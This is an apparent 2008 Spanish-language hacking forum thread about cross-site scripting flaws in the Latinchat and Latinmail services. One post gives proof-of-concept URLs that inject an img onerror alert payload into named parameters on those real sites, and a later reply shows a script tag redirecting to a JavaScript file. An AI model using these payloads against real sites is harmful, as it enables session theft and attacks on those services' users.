Bug Latinchat

Iniciado por jeireuz, 16 Febrero 2008, 03:06 AM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1 2
Acciones del Usuario

jeireuz

16 Febrero 2008, 03:06 AM
Bien desde hace mucho, que conozco este bug

el cualquien ventana de platica es posible

enviar alertas, y cualquier tipo de senterncia java Script y VBS
La realidad es la veracidad de la creencia de la propia existencia.

bigsnake

#1
16 Febrero 2008, 13:50 PM
enviar sentencias de script??
a que te refieres??
se podrian ejecutar archivos remotamente de esa forma???

dw

6666

#2
16 Febrero 2008, 16:31 PM
si .. la verdad que tmb conozco uno quizas sea el mismo .. se puede meter codigo en la ventana de chat .. quizas sea explotable. me pondre a ver que encuentro.yo pensaba que tenia html injection pero al final no le llegaba mi codigo al resto asi que me olvide.

salu2!

Rozor

#3
17 Febrero 2008, 18:53 PM
¿Y la demostración?. Yo conozco desde hace tiempo un bug en el CNI y donde quiera si no lo demuestro....
out in the streets they call it murder....

6666

#4
18 Febrero 2008, 00:46 AM
Desmostrcion? no perdere tiempo en subir imagenes pero si podes ir a una sala de latinchat y donde escribis el mensaje pones <img src="URL"> y mostrara la imagen.

Rozor

#5
18 Febrero 2008, 11:06 AM
No me referia a capturas me referia a lo que acabas de decir eso es la prueba de concepto ( PoC ) y es la demostración ;)
out in the streets they call it murder....

berz3k

#6
18 Febrero 2008, 11:38 AM

Es importante antes de postear un nuevo tema leer y probar, mejor aun; realizar alguna especie de PoC (Proof Of Concept ), con estos detalles podremos ayudar o aportar mejores ideas para un buen entendimiento o posible "explotacion", no lanzar preguntas o posibles fallos "on air", tampoco son necesarios los "screenshots" o patallazos a menos que se requiera profundizar o detallar algun aspecto ademas de obsfuscar los detalles comprometedores. Leer las reglas del foro.


-berz3k.

@z1x2c3z1x2c3| cuanto tiempo podras invertir en presionar el boton "Impr Pant" y subirla al publico? 8 horas ? 10 horas? las imagenes, video o code, son la mejor parte de un PoC.



6666

#7
20 Febrero 2008, 05:09 AM Ultima modificación: 20 Febrero 2008, 14:20 PM por z1x2c3z1x2c3|
Latinchat XSS

imagen:

http://img204.¡mageshack.us/img204/4500/43171804ii3.jpg


Input vulnerable 'UserName'

http://login04.latinchat.com/magma_qa/templates/modules/result/T2.php?UserName=%3Cimg%20src=http:%20onerror=alert(String.fromCharCode(88,83,83))%20/%3E&InstanceID=R31_1-1

--------------------------------------------------------------------------------------------------------------------------------------------------------------
Latin mail
http://img254.¡mageshack.us/img254/2719/pantallazo1xp1.png


http://www.latinmail.com/nousuario.php?domain=%3Cimg%20src=http:%20onerror=alert(String.fromCharCode(88,83,83))%20/%3E

------------------------------------------------------------------

ventana de chat

Código [Seleccionar]
http://img411.¡mageshack.us/img411/7/dibujoaz4.jpg
Código [Seleccionar]
http://img411.¡mageshack.us/img411/2485/dibujozr6.jpg

bigsnake

#8
20 Febrero 2008, 16:37 PM
pero, esto no se puede explotar de ninguna otra forma??
vease ejecucion archivos remota o algo por el estilo
grx
dw

6666

#9
20 Febrero 2008, 16:41 PM
se puede ejecutar vbs o javascript por ejemplo <script>document.location='lala.js'</script> mm no se que màs se puede hacer remoto ..
yo habia encontrado esto

http://foro.elhacker.net/index.php/topic,197376.0.html
Imprimir
Ir Arriba Páginas1 2
Acciones del Usuario